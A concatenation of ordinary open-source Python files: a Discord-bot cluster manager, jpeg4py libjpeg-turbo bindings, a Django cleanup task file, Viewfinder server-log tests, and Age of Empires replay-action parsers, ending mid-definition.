20") except Exception as e: self.logger.error(format_exception(e)) async def clear_trivia_commands_loop(self): while True: await asyncio.sleep(10 * 60) try: self.v.trivia_commands.clear() except Exception as e: self.logger.error(format_exception(e)) async def remind_reminders_loop(self): while True: await asyncio.sleep(5) try: reminders = await self.db.fetch( "DELETE FROM reminders WHERE at <= NOW() RETURNING channel_id, user_id, message_id, reminder" ) for reminder in reminders: broadcast_id = f"b{self.current_id}" self.current_id += 1 broadcast_packet = {"type": PacketType.REMINDER, "id": broadcast_id, **reminder} broadcast_coros = [s.write_packet(broadcast_packet) for s in self.server.connections] broadcast = self.broadcasts[broadcast_id] = { "ready": asyncio.Event(), "responses": [], "expects": len(broadcast_coros), } await asyncio.wait(broadcast_coros) await broadcast["ready"].wait() except Exception as e: self.logger.error(format_exception(e)) with open("reminderrors.txt", "a+") as f: f.write("\n" + format_exception(e) + "\n") async def start(self, pp): self.db = await asyncpg.create_pool( host=self.k.database.host, # where db is hosted database=self.k.database.name, # name of database user=self.k.database.user, # database username password=<PASSWORD>, # password which goes with user max_size=3, min_size=1, ) await self.server.start() self.cooldowns.start() self.commands_task = asyncio.create_task(self.commands_dump_loop()) self.heal_users_task = asyncio.create_task(self.heal_users_loop()) self.clear_trivia_commands_task = asyncio.create_task(self.clear_trivia_commands_loop()) self.reminders_task = asyncio.create_task(self.remind_reminders_loop()) shard_groups = [] loop = asyncio.get_event_loop() g = self.k.cluster_size # calculate max connections to the db server per process allowed # postgresql is usually configured to allow 100 max, so we use # 75 to leave room for other programs using the db server db_pool_size_per = 75 // (self.k.shard_count // g + 1) for shard_id_group in [self.shard_ids[i : i + g] for i in range(0, len(self.shard_ids), g)]: shard_groups.append(loop.run_in_executor(pp, run_cluster, self.k.shard_count, shard_id_group, db_pool_size_per)) await asyncio.wait(shard_groups) self.cooldowns.stop() self.commands_task.cancel() self.heal_users_task.cancel() self.clear_trivia_commands_task.cancel() self.reminders_task.cancel() await self.db.close() def run(self): with ProcessPoolExecutor(self.k.shard_count // self.k.cluster_size + 1) as pp: asyncio.run(self.start(pp))
src/jpeg4py/_py.py
ajkxyz/jpeg4py
103
12730118
<reponame>ajkxyz/jpeg4py<gh_stars>100-1000 """ Copyright (c) 2014, Samsung Electronics Co.,Ltd. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The views and conclusions contained in the software and documentation are those of the authors and should not be interpreted as representing official policies, either expressed or implied, of Samsung Electronics Co.,Ltd.. """ """ jpeg4py - libjpeg-turbo cffi bindings and helper classes. URL: https://github.com/ajkxyz/jpeg4py Original author: <NAME> <<EMAIL>> """ """ Helper classes for libjpeg-turbo cffi bindings. """ import jpeg4py._cffi as jpeg from jpeg4py._cffi import TJPF_RGB import numpy import os class JPEGRuntimeError(RuntimeError): def __init__(self, msg, code): super(JPEGRuntimeError, self).__init__(msg) self.code = code class Base(object): """Base class. Attributes: lib_: cffi handle to loaded shared library. """ def __init__(self, lib_): """Constructor. Parameters: lib_: cffi handle to loaded shared library. """ if lib_ is None: jpeg.initialize() lib_ = jpeg.lib self.lib_ = lib_ def get_last_error(self): """Returns last error string. """ return jpeg.ffi.string(self.lib_.tjGetErrorStr()).decode("utf-8") class Handle(Base): """Stores tjhandle pointer. Attributes: handle_: cffi tjhandle pointer. """ def __init__(self, handle_, lib_): """Constructor. Parameters: handle_: cffi tjhandle pointer. """ self.handle_ = None super(Handle, self).__init__(lib_) self.handle_ = handle_ def release(self): if self.handle_ is not None: self.lib_.tjDestroy(self.handle_) self.handle_ = None class JPEG(Base): """Main class. Attributes: decompressor: Handle object for decompressor. source: numpy array with source data, either encoded raw jpeg which may be decoded/transformed or or source image for the later encode. width: image width. height: image height. subsampling: level of chrominance subsampling. Static attributes: decompressors: list of decompressors for caching purposes. """ decompressors = [] @staticmethod def clear(): """Clears internal caches. """ # Manually release cached JPEG decompressors for handle in reversed(JPEG.decompressors): handle.release() del JPEG.decompressors[:] def __init__(self, source, lib_=None): """Constructor. Parameters: source: source for JPEG operations (numpy array or file name). """ super(JPEG, self).__init__(lib_) self.decompressor = None self.width = None self.height = None self.subsampling = None if hasattr(source, "__array_interface__"): self.source = source elif numpy.fromfile is not None: self.source = numpy.fromfile(source, dtype=numpy.uint8) else: fin = open(source, "rb") self.source = numpy.empty(os.path.getsize(source), dtype=numpy.uint8) fin.readinto(self.source) fin.close() def _get_decompressor(self): if self.decompressor is not None: return try: self.decompressor = JPEG.decompressors.pop(-1) except IndexError: d = self.lib_.tjInitDecompress() if d == jpeg.ffi.NULL: raise JPEGRuntimeError( "tjInitDecompress() failed with error " "string %s" % self.get_last_error(), 0) self.decompressor = Handle(d, self.lib_) def parse_header(self): """Parses JPEG header. Fills self.width, self.height, self.subsampling. """ self._get_decompressor() whs = jpeg.ffi.new("int[]", 3) whs_base = int(jpeg.ffi.cast("size_t", whs)) whs_itemsize = int(jpeg.ffi.sizeof("int")) n = self.lib_.tjDecompressHeader2( self.decompressor.handle_, jpeg.ffi.cast("unsigned char*", self.source.__array_interface__["data"][0]), self.source.nbytes, jpeg.ffi.cast("int*", whs_base), jpeg.ffi.cast("int*", whs_base + whs_itemsize), jpeg.ffi.cast("int*", whs_base + whs_itemsize + whs_itemsize)) if n: raise JPEGRuntimeError("tjDecompressHeader2() failed with error " "%d and error string %s" % (n, self.get_last_error()), n) self.width = int(whs[0]) self.height = int(whs[1]) self.subsampling = int(whs[2]) def decode(self, dst=None, pixfmt=TJPF_RGB): bpp = jpeg.tjPixelSize[pixfmt] if dst is None: if self.width is None: self.parse_header() sh = [self.height, self.width] if bpp > 1: sh.append(bpp) dst = numpy.zeros(sh, dtype=numpy.uint8) elif not hasattr(dst, "__array_interface__"): raise ValueError("dst should be numpy array or None") if len(dst.shape) < 2: raise ValueError("dst shape length should 2 or 3") if dst.nbytes < dst.shape[1] * dst.shape[0] * bpp: raise ValueError( "dst is too small to hold the requested pixel format") self._get_decompressor() n = self.lib_.tjDecompress2( self.decompressor.handle_, jpeg.ffi.cast("unsigned char*", self.source.__array_interface__["data"][0]), self.source.nbytes, jpeg.ffi.cast("unsigned char*", dst.__array_interface__["data"][0]), dst.shape[1], dst.strides[0], dst.shape[0], pixfmt, 0) if n: raise JPEGRuntimeError("tjDecompress2() failed with error " "%d and error string %s" % (n, self.get_last_error()), n) return dst def __del__(self): # Return decompressor to cache. if self.decompressor is not None: JPEG.decompressors.append(self.decompressor)
tasks.py
imkevinxu/django-kevin
250
12730126
from invoke import task, run from os.path import dirname, abspath # Create scripted tasks to run in command-line here # http://docs.pyinvoke.org/en/latest/ PROJECT_ROOT = '%s/{{ project_name }}' % dirname(abspath(__file__)) @task def clean(): """Clean up static, compiled, test, and log files""" print("Deleting *.pyc files...") run('find . -name *.pyc -delete') print("Deleting collected static files...") run('rm -rf %s/public' % PROJECT_ROOT) print("Deleting compiled stylesheets...") run('rm -rf %s/static/css/build' % PROJECT_ROOT) print("Deleting compiled scripts...") run('rm -rf %s/static/js/build' % PROJECT_ROOT) run('rm -rf %s/static/js/tests/build' % PROJECT_ROOT) print('Deleting compressed images...') run('rm -rf %s/static/img/compressed' % PROJECT_ROOT) print('Deleting test files...') run('rm -rf tests/*') run('rm -rf .coverage') run('rm -rf _SpecRunner.html') print('Deleting log files...') run('rm -rf logs/*')
backend/storage/test/server_log_test.py
xuantan/viewfinder
645
12730151
<reponame>xuantan/viewfinder # Copyright 2012 Viewfinder Inc. All Rights Reserved. """Server log tests. """ __author__ = '<EMAIL> (<NAME>)' import logging import os import re import sys import tempfile import time from functools import partial from tornado import options, testing from viewfinder.backend.storage.object_store import ObjectStore, InitObjectStore from viewfinder.backend.storage.file_object_store import FileObjectStore from viewfinder.backend.storage.server_log import BatchingLogHandler, LogBatch, LogBatchPersistor, InitServerLog, FinishServerLog from viewfinder.backend.base import util, counters from viewfinder.backend.base.testing import async_test, BaseTestCase class _BadObjectStore(FileObjectStore): """A file object store which simply does not return requests for puts. If 'fail_fast' is True, returns an error immediately. """ def __init__(self, bucket_name, temporary=False, fail_fast=False): super(_BadObjectStore, self).__init__(bucket_name, temporary) self._fail_fast = fail_fast self._put_map = dict() def Put(self, key, value, callback): self._put_map[key] = value if self._fail_fast: raise Exception('failed to put key %s' % key) def GetPutValue(self, key): return self._put_map[key] class _FakePersistor(object): """Fake log persistor - simply accepts batches without accepting them.""" def __init__(self): self.batches = {} self._handlers = [] def PersistLogBatch(self, batch): self.batches[batch.Key()] = batch def AddHandler(self, handler): """Add a handler to the list of handlers registered with this persistor.""" if not handler in self._handlers: self._handlers.append(handler) def RemoveHandler(self, handler): """Remove a handler from the list of handlers registered with this persistor.""" if handler in self._handlers: self._handlers.remove(handler) def close(self, callback=None): for h in list(self._handlers): h.close() if callback: callback() class _BasicLogHandler(BatchingLogHandler): STORE_NAME = 'basic_store' def __init__(self, *args, **kwargs): super(_BasicLogHandler, self).__init__(*args, **kwargs) self.batch_no = 0 def MakeBatch(self, buffer): self.batch_no += 1 return LogBatch(buffer, self.STORE_NAME, 'basic', self.batch_no) class LogBatchPersistorTestCase(BaseTestCase, testing.LogTrapTestCase): def setUp(self): options.options.fileobjstore = True super(LogBatchPersistorTestCase, self).setUp() InitObjectStore(temporary=True) def tearDown(self): super(LogBatchPersistorTestCase, self).tearDown() def testPersistor(self): """Basic test for a log persistor.""" backup_dir = tempfile.mkdtemp() persistor = LogBatchPersistor(backup_dir=backup_dir) batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'), LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'), LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC'), LogBatch('Log batch buffer 4D', ObjectStore.USER_LOG, 'test4', 'keyD'), LogBatch('Log batch buffer 5E', ObjectStore.USER_LOG, 'test5', 'keyE')] for batch in batches: persistor.PersistLogBatch(batch) self._RunAsync(persistor.Wait) # No files should have been backed up. files = os.listdir(os.path.join(backup_dir, os.path.basename(sys.argv[0]))) self.assertEqual(0, len(files)) self._RunAsync(self._VerifyObjStoreBatches, batches) def testBadObjStore(self): """Tests backup storage in case the object store is down. Also verifies close() method.""" backup_dir = tempfile.mkdtemp() persistor = LogBatchPersistor(backup_dir=backup_dir) batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'), LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'), LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC'), LogBatch('Log batch buffer 4D', ObjectStore.USER_LOG, 'test4', 'keyD'), LogBatch('Log batch buffer 5E', ObjectStore.USER_LOG, 'test5', 'keyE')] oldStores = [ObjectStore.GetInstance(ObjectStore.SERVER_LOG), ObjectStore.GetInstance(ObjectStore.USER_LOG)] ObjectStore.SetInstance(ObjectStore.SERVER_LOG, _BadObjectStore(ObjectStore.SERVER_LOG_BUCKET, temporary=True, fail_fast=False)) ObjectStore.SetInstance(ObjectStore.USER_LOG, _BadObjectStore(ObjectStore.USER_LOG_BUCKET, temporary=True, fail_fast=False)) # Cut the timeout allowed for flushing buffers on close to something small. persistor._CLOSE_TIMEOUT_SECS = 0.100 for batch in batches: persistor.PersistLogBatch(batch) self._RunAsync(persistor.close) self._VerifyBackupBatches(backup_dir, batches) # Set a functional file object store instance and verify that it # restores the pending server logs. ObjectStore.SetInstance(ObjectStore.SERVER_LOG, oldStores[0]) ObjectStore.SetInstance(ObjectStore.USER_LOG, oldStores[1]) persistor = LogBatchPersistor(backup_dir=backup_dir) self._RunAsync(persistor.Wait) self._RunAsync(self._VerifyObjStoreBatches, batches) def testRestoreTimeout(self): """Verifies the persistor will reattempt failed object store writes after a timeout""" backup_dir = tempfile.mkdtemp() persistor = LogBatchPersistor(backup_dir=backup_dir) batches = [LogBatch('Log batch buffer 1A', ObjectStore.SERVER_LOG, 'test1', 'keyA'), LogBatch('Log batch buffer 2B', ObjectStore.SERVER_LOG, 'test2', 'keyB'), LogBatch('Log batch buffer 3C', ObjectStore.SERVER_LOG, 'test3', 'keyC')] persistor._RESTORE_INTERVAL_SECS = 0.100 # The "bad" object store which does nothing with puts. oldStore = ObjectStore.GetInstance(ObjectStore.SERVER_LOG) ObjectStore.SetInstance(ObjectStore.SERVER_LOG, _BadObjectStore(ObjectStore.SERVER_LOG_BUCKET, temporary=True, fail_fast=True)) for batch in batches: persistor.PersistLogBatch(batch) self.io_loop.add_callback(partial(self._VerifyBackupBatches, backup_dir, batches)) # Reinstate the "good" object store. ObjectStore.SetInstance(ObjectStore.SERVER_LOG, oldStore) self._RunAsync(self.io_loop.add_timeout, time.time() + 0.200) self._RunAsync(self._VerifyObjStoreBatches, batches) def _SortBatchesByStore(self, batches): batches_by_store = {} for batch in batches: key = batch.store_name store_batches = batches_by_store.setdefault(key, []) store_batches.append(batch) return batches_by_store def _VerifyObjStoreBatches(self, exp_batches, callback): def _OnGetBatch(exp_batch, cb, buffer): self.assertEqual(exp_batch.buffer, buffer) cb() def _OnListKeys(store, batches, cb, keys): self.assertEqual(len(batches), len(keys)) with util.Barrier(cb) as b2: for batch in batches: self.assertIn(batch.Key(), keys) store.Get(batch.Key(), partial(_OnGetBatch, batch, b2.Callback())) batches_by_store = self._SortBatchesByStore(exp_batches) with util.Barrier(callback) as b: for store in batches_by_store.keys(): batches = batches_by_store[store] store = ObjectStore.GetInstance(store) store.ListKeys(partial(_OnListKeys, store, batches, b.Callback())) def _VerifyBackupBatches(self, backup_dir, exp_batches): batches_by_store = self._SortBatchesByStore(exp_batches) dir = os.path.join(backup_dir, os.path.basename(sys.argv[0])) store_dirs = os.listdir(dir) self.assertEqual(len(batches_by_store.keys()), len(store_dirs)) for store in batches_by_store.keys(): self.assertIn(store, store_dirs) store_dir = os.path.join(dir, store) batches = batches_by_store[store] self.assertEqual(len(batches), len(os.listdir(store_dir))) for batch in batches: file = os.path.join(store_dir, batch.FileSystemKey()) self.assertTrue(os.path.exists(file)) self.assertTrue(os.path.isfile(file)) with open(file, 'r') as f: buffer = f.read() self.assertEqual(batch.buffer, buffer) class BatchingLogHandlerTestCase(BaseTestCase, testing.LogTrapTestCase): def setUp(self): super(BatchingLogHandlerTestCase, self).setUp() self._persistor = _FakePersistor() LogBatchPersistor.SetInstance(self._persistor) def testBatching(self): """Tests that the server log writes to object store.""" basic_log = _BasicLogHandler(max_buffer_bytes=100) record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test'}) basic_log.emit(record) basic_log.flush() self._RunAsync(self._VerifyLog, ['test']) def testBadLogMessages(self): """Tests log messages with both 8-bit byte strings and unicode.""" basic_log = _BasicLogHandler(max_buffer_bytes=100) record = logging.makeLogRecord({'level': logging.INFO, 'msg': '\x80abc'}) basic_log.emit(record) record = logging.makeLogRecord({'level': logging.INFO, 'msg': u'\x80abc'}) basic_log.emit(record) basic_log.flush() def testMultipleFlushes(self): """Tests multiple flushes.""" basic_log = _BasicLogHandler(flush_interval_secs=0.100) for i in xrange(8): record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test%d' % i}) basic_log.emit(record) basic_log.flush() self._RunAsync(self._VerifyLog, ['test%d' % i for i in range(8)]) def testMaxBytesFlush(self): """Tests that the server log flushes based on maximum bytes written.""" basic_log = _BasicLogHandler(max_buffer_bytes=100) msg = 'test' * 100 record = logging.makeLogRecord({'level': logging.INFO, 'msg': msg}) basic_log.emit(record) self._RunAsync(self._VerifyLog, [msg]) def testTimeoutFlush(self): """Tests that the server log flushes after maximum flush interval.""" basic_log = _BasicLogHandler(flush_interval_secs=0.100) record = logging.makeLogRecord({'level': logging.INFO, 'msg': 'test'}) basic_log.emit(record) self._RunAsync(self.io_loop.add_timeout, time.time() + 0.150) self._RunAsync(self._VerifyLog, ['test']) def testFinishServerLog(self): """Verify that 'close()' is called on the server handler when the persistor is closed. """ persistor = _FakePersistor() InitServerLog(persistor) self.assertEqual(2, len(persistor._handlers)) basic_handler = _BasicLogHandler() basic_handler.setLevel(logging.INFO) with basic_handler.LoggingContext(): self.assertEqual(3, len(persistor._handlers)) self.assertEqual(0, len(persistor.batches)) logging.info('Test Message') self.assertEqual(3, len(persistor._handlers)) self._RunAsync(FinishServerLog) self.assertEqual(0, len(persistor._handlers)) self.assertEqual(2, len(persistor.batches)) def testFinishServerLogWithErrors(self): """Verify that the error log handler properly batches. """ persistor = _FakePersistor() InitServerLog(persistor) self.assertEqual(2, len(persistor._handlers)) basic_handler = _BasicLogHandler() basic_handler.setLevel(logging.INFO) with basic_handler.LoggingContext(): self.assertEqual(3, len(persistor._handlers)) self.assertEqual(0, len(persistor.batches)) logging.error('Test Error') self.assertEqual(3, len(persistor._handlers)) self._RunAsync(FinishServerLog) self.assertEqual(0, len(persistor._handlers)) self.assertEqual(3, len(persistor.batches)) def _VerifyLog(self, exp_msgs, callback): """Verifies that there are len('exp_msg') batches stored and that each contains the expected message as contents. """ def _DoVerify(): batches = self._persistor.batches self.assertEqual(len(batches), len(exp_msgs)) for key, msg in zip(sorted(batches.keys()), exp_msgs): value = batches[key].buffer regexp = re.compile('\[pid:[0-9]+\] .*:[0-9]+: %s' % msg) self.assertTrue(regexp.search(value) is not None, '%s not found in %s' % (msg, value)) callback() self.io_loop.add_callback(_DoVerify) class ServerLogHandlerTestCase(BaseTestCase, testing.LogTrapTestCase): def testErrorCounters(self): """Verify that error-counting performance counters are working correctly. These performance counters are implemented as a log filter. """ meter = counters.Meter(counters.counters.viewfinder.errors) InitServerLog(_FakePersistor()) def _CheckCounters(expected_errors, expected_warnings): sample = meter.sample() self.assertEqual(expected_errors, sample.viewfinder.errors.error) self.assertEqual(expected_warnings, sample.viewfinder.errors.warning) _CheckCounters(0, 0) old_level = logging.getLogger().level logging.getLogger().setLevel(logging.DEBUG) logging.critical('Critical') logging.error('Error1') logging.warning('Warning1') logging.warning('Warning2') logging.getLogger().setLevel(old_level) self._RunAsync(FinishServerLog) _CheckCounters(2, 2) _CheckCounters(0, 0)
mgz/body/actions.py
Namek/aoc-mgz
117
12730158
"""Actions.""" from construct import (Array, Byte, Const, CString, Flag, Float32l, If, Int16ul, Int32sl, Int32ul, Padding, Peek, String, Struct, this, Bytes, Embedded, IfThenElse) from mgz.body.achievements import achievements from mgz.enums import (DiplomacyStanceEnum, FormationEnum, GameActionModeEnum, OrderTypeEnum, ReleaseTypeEnum, ResourceEnum, ResourceLevelEnum, RevealMapEnum, StanceEnum, AgeEnum, VictoryEnum) from mgz.util import TimeSecAdapter, check_flags # pylint: disable=invalid-name, bad-continuation # Not all actions are defined, not all actions are complete. interact = "interact"/Struct( "player_id"/Byte, Const(b"\x00\x00"), "target_id"/Int32ul, "selected"/Int32ul, "x"/Float32l, "y"/Float32l, "next"/Peek(Bytes(8)), "flags"/If(lambda ctx: check_flags(ctx.next), Bytes(8)), "unit_ids"/If(lambda ctx: ctx.selected < 0xff, Array( lambda ctx: ctx.selected, "unit_ids"/Int32ul )) ) give_attribute = "give_attribute"/Struct( "player_id"/Byte, "target_id"/Byte, "attribute"/Byte, "amount"/Float32l ) add_attribute = "add_attribute"/Struct( "player_id"/Byte, "attribute"/Byte, Padding(1), "amount"/Float32l ) create = "create"/Struct( Padding(1), "unit_type"/Int16ul, "player_id"/Byte, Padding(1), "x"/Float32l, "y"/Float32l, "z"/Float32l ) ai_interact = "ai_interact"/Struct( Padding(3), "target_id"/Int32ul, "selected"/Byte, Padding(3), "x"/Float32l, "y"/Float32l, If(lambda ctx: ctx.selected < 0xff, Array( lambda ctx: ctx.selected, "unit_ids"/Int32ul )) ) move = "move"/Struct( "player_id"/Byte, Const(b"\x00\x00"), Padding(4), "selected"/Int32ul, "x"/Float32l, "y"/Float32l, If(lambda ctx: ctx.selected < 0xff, Struct( "next"/Peek(Bytes(8)), "flags"/If(lambda ctx: check_flags(ctx.next), Bytes(8)) )), "unit_ids"/If(lambda ctx: ctx.selected < 0xff, Array( lambda ctx: ctx.selected, Int32ul )) ) ai_move = "ai_move"/Struct( "selected"/Byte, "player_id"/Byte, "player_num"/Byte, Padding(4), Padding(4), "target_id"/Int32ul, Padding(1), Padding(3), "x"/Float32l, "y"/Float32l, Padding(4), Padding(4), Padding(4), If(lambda ctx: ctx.selected > 0x01, Array( lambda ctx: ctx.selected, "unit_ids"/Int32ul )) ) resign = "resign"/Struct( "player_id"/Byte, "player_num"/Byte, "disconnected"/Flag ) spec = "spec"/Struct( Padding(lambda ctx: ctx._._.length - 1) ) queue = "queue"/Struct( Padding(3), "building_id"/Int32ul, "unit_type"/Int16ul, "number"/Int16ul, ) multiqueue = "multiqueue"/Struct( Padding(3), "unit_type"/Int16ul, "num_buildings"/Byte, "queue_amount"/Byte, Array(lambda ctx: ctx.num_buildings, "building_ids"/Int32ul) ) ai_queue = "ai_queue"/Struct( Padding(3), "building_id"/Int32ul, "player_id"/Int16ul, "unit_type"/Int16ul, Padding(4) ) research = "research"/Struct( Padding(3), "building_id"/Int32ul, "player_id"/Int16ul, "next"/Peek( Struct( Padding(6), "check"/Int32sl ) ), IfThenElse(lambda ctx: ctx.next.check == -1, Embedded(Struct( "selected"/Int16ul, "technology_type"/Int32ul, Array(lambda ctx: ctx.selected, "selected_ids"/Int32sl) )), Embedded(Struct( "technology_type"/Int16ul, Array(1, "selected_ids"/Int32sl) )) ) ) sell = "sell"/Struct( "player_id"/Byte, ResourceEnum("resource_type"/Byte), "amount"/Byte, Padding(4) ) buy = "buy"/Struct( "player_id"/Byte, ResourceEnum("resource_type"/Byte), "amount"/Byte, Padding(4) ) stop = "stop"/Struct( "selected"/Byte, Array(lambda ctx: ctx.selected, "object_ids"/Int32ul) ) stance = "stance"/Struct( "selected"/Byte, StanceEnum("stance_type"/Byte), Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) guard = "guard"/Struct( "selected"/Byte, Padding(2), "guarded_unit_id"/Int32ul, Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) follow = "follow"/Struct( "selected"/Byte, Padding(2), "followed_unit_id"/Int32ul, Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) formation = "formation"/Struct( "selected"/Byte, "player_id"/Int16ul, FormationEnum("formation_type"/Int32ul), Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) save = "save"/Struct( "exited"/Flag, "player_id"/Byte, "filename"/CString(encoding='latin1'), Padding(lambda ctx: ctx._._.length - 23), "checksum"/Int32ul ) chapter = "chapter"/Struct( "player_id"/Byte ) build = "build"/Struct( "selected"/Byte, "player_id"/Int16ul, "x"/Float32l, "y"/Float32l, "building_type"/Int32ul, Padding(4), "sprite_id"/Int32ul, Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) game = "game"/Struct( "mode"/GameActionModeEnum("mode_id"/Byte), "player_id"/Byte, Padding(1), "diplomacy"/If(this.mode == 'diplomacy', Struct( "target_player_id"/Byte, Padding(3), "stance_float"/Float32l, "stance"/DiplomacyStanceEnum("stance_id"/Byte), )), "speed"/If(this.mode == 'speed', Struct( Padding(4), "speed"/Float32l, Padding(1) )), "instant_build"/If(this.mode == 'instant_build', Struct( Padding(9) )), "quick_build"/If(this.mode == 'quick_build', Struct( "status"/Flag, Padding(8), )), "allied_victory"/If(this.mode == 'allied_victory', Struct( "player_id"/Byte, "status"/Flag, Padding(7) )), "cheat"/If(this.mode == 'cheat', Struct( "cheat_id"/Byte, Padding(8) )), "unk0"/If(this.mode == 'unk0', Struct( Padding(9) )), "spy"/If(this.mode == 'spy', Struct( Padding(9) )), "unk1"/If(this.mode == 'unk1', Struct( Padding(9) )), "farm_queue"/If(this.mode == 'farm_queue', Struct( "amount"/Byte, # this seems to be a bit inconsistent between versions, needs more research Padding(8) )), "farm_unqueue"/If(this.mode == 'farm_unqueue', Struct( "amount"/Byte, # this seems to be a bit inconsistent between versions, needs more research Padding(8) )), # toggle farm auto seed queue "farm_autoqueue"/If(this.mode == 'farm_autoqueue', Struct( Padding(9) )), "fishtrap_queue" / If(this.mode == 'fishtrap_queue', Struct( "amount" / Byte, Padding(8) )), "fishtrap_unqueue" / If(this.mode == 'fishtrap_unqueue', Struct( "amount" / Byte, Padding(8) )), # toggle fish trap auto place queue "fishtrap_autoqueue"/If(this.mode == 'fishtrap_autoqueue', Struct( Padding(9) )), # toggles the default stance when units are created. All players start on aggressive by default, if the player # (initially) has defensive enabled it is called right before the first unit is queued, and again every time # the player toggles it in the game options menu "default_stance" / If(this.mode == 'default_stance', Struct( Padding(9) )), Padding(3) ) droprelic = "droprelic"/Struct( Const(b"\x00\x00\x00"), 'unit_id'/Int32ul ) wall = "wall"/Struct( "selected"/Byte, "player_id"/Byte, IfThenElse(lambda ctx: ctx._._.length - 16 - (ctx.selected * 4) == 8, Embedded(Struct( Padding(1), "start_x"/Int16ul, "start_y"/Int16ul, "end_x"/Int16ul, "end_y"/Int16ul, "building_id"/Int32ul, Padding(4), "flags"/Bytes(4) )), Embedded(Struct( "start_x"/Byte, "start_y"/Byte, "end_x"/Byte, "end_y"/Byte, Padding(1), "building_id"/Int32ul, Padding(4), )) ), Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) delete = "delete"/Struct( Padding(3), "object_id"/Int32ul, "player_id"/Int32ul ) attackground = "attackground"/Struct( "selected"/Byte, Padding(2), "x"/Float32l, "y"/Float32l, "next"/Peek(Bytes(4)), "flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)), Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) tribute = "tribute"/Struct( "player_id"/Byte, "player_id_to"/Byte, ResourceEnum("resource_type"/Byte), "amount"/Float32l, "fee"/Float32l ) repair = "repair"/Struct( "selected"/Byte, Padding(2), "repaired_id"/Int32ul, "next"/Peek(Bytes(4)), "flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)), Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) release = "release"/Struct( "selected"/Int16ul, Padding(1), "x"/Float32l, # -1 if none "y"/Float32l, # -1 if none ReleaseTypeEnum("release_type"/Byte), Padding(3), "release_id"/Int32ul, Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) """ unload = "unload"/Struct( "selected"/Int16ul, Padding(1), "x"/Float32l, # -1 if none "y"/Float32l, # -1 if none Padding(4), Padding(4), # 0xffffffff Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) """ togglegate = "togglegate"/Struct( Padding(3), "gate_id"/Int32ul ) flare = "flare"/Struct( Padding(7), Array(9, "player_ids"/Byte), Padding(3), "x"/Float32l, "y"/Float32l, "player_id"/Byte, "player_number"/Byte, Padding(2) ) order = "order"/Struct( "selected"/Byte, Padding(2), "building_id"/Int32sl, # -1 cancels production queue OrderTypeEnum("order_type"/Byte), "cancel_order"/Byte, # when cancelling production queue, this indicates which item in the queue is to be cancelled Padding(2), "x"/Float32l, "y"/Float32l, Padding(4), # const "next"/Peek(Bytes(4)), "flags"/If(lambda ctx: check_flags(ctx.next), Bytes(4)), Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul), ) gatherpoint = "gatherpoint"/Struct( "selected"/Byte, Padding(2), "target_id"/Int32ul, "target_type"/Int32ul, "x"/Float32l, "y"/Float32l, Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul) ) townbell = "townbell"/Struct( Padding(3), "towncenter_id"/Int32ul, "active"/Int32ul ) """Patrol 10 X-coordinates followed by 10 Y-coordinates First of each is popped off for consistency with other actions """ patrol = "patrol"/Struct( "selected"/Byte, "waypoints"/Int16ul, "x"/Float32l, Array(9, "x_more"/Float32l), "y"/Float32l, Array(9, "y_more"/Float32l), Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul), ) waypoint = "waypoint"/Struct( Padding(1), "selected"/Byte, "x"/Byte, "y"/Byte, "building_ids"/If(lambda ctx: ctx.selected != 255, Array( lambda ctx: ctx.selected, Int32ul )) ) ai_waypoint = "ai_waypoint"/Struct( "selected"/Byte, "waypoint_count"/Byte, Array(lambda ctx: ctx.selected, "unit_ids"/Int32ul), Array(lambda ctx: ctx.waypoint_count, "x_more"/Byte), Array(lambda ctx: ctx.waypoint_count, "y_more"/Byte) ) backtowork = "backtowork"/Struct( Padding(3), "towncenter_id"/Int32ul ) ai_command = "ai_command"/Struct( Padding(lambda ctx: ctx._._.length - 1) ) """DE Queue In DE queue and multi queue share the same command """ de_queue = "de_queue"/Struct( "player_id"/Byte, "building_type"/Int16ul, "selected"/Byte, Padding(1), "unit_type"/Int16ul, 